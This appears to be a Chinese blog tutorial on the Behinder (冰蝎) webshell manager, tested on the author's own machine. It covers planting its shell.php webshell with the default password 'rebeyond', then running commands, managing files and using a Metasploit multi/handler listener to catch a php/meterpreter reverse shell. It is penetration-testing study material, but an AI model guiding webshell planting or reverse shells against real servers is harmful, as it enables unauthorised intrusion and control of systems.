一.启动
Windows环境下:
1.配置环境:冰蝎只支持jre6-jre8
可以在电脑上查看java版本
命令:java -version
2.启动
在冰蝎目录下命令行输入
命令:java -jar Behinder_v3.0_Beta6_win.jar(这里文件名可简化)
即可开启
Linux环境下:
注意切换jdk版本6-8,对应javac版本也要和java版本相同,同理打开冰蝎目录输入命令
二.使用(在本机进行实测)
环境:phpStudy+冰蝎
通过启动phpStudy,访问本机地址
成功访问说明环境已经搭建成功
在网站根目录下创建一个shell2.php的php文件,文件内容需要我们下载的冰蝎server中带有的shell.php文件中的内容复制过去
可以看到默认连接密码为rebeyond
这时通过冰蝎去连接该文件
输入URL和密码即可
点击此URL
可以看到成功连接,此时已经把基本信息显示出来了
三.模块介绍
1.基本信息
直接显示出phpinfo,通过此表可以用来信息收集
2.命令执行
3.虚拟终端
也可以进行cmd.exe,powershell.exe等功能
4.文件管理
可以操作管理文件
5.内网渗透
6.反弹shell
这里演示利用kali虚拟机作监听
Kali(10.0.78.17)
本机(10.0.78.14)
(1)首先打开msf,设置监听
命令:use exploit/multi/handler
set payload php/meterpreter/reverse_tcp(主要此时的paload)
接下来设置参数
命令:show options
可以看到只需要设置LHOST即可
命令:set LHOST 10.0.78.17
然后exploit执行
跳转到冰蝎界面,输入对应ip地址及端口,点击给我连
查看结果
成功返回meterpreter
7.管理数据库
冰蝎原理参考:https://xz.aliyun.com/t/2774
231
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
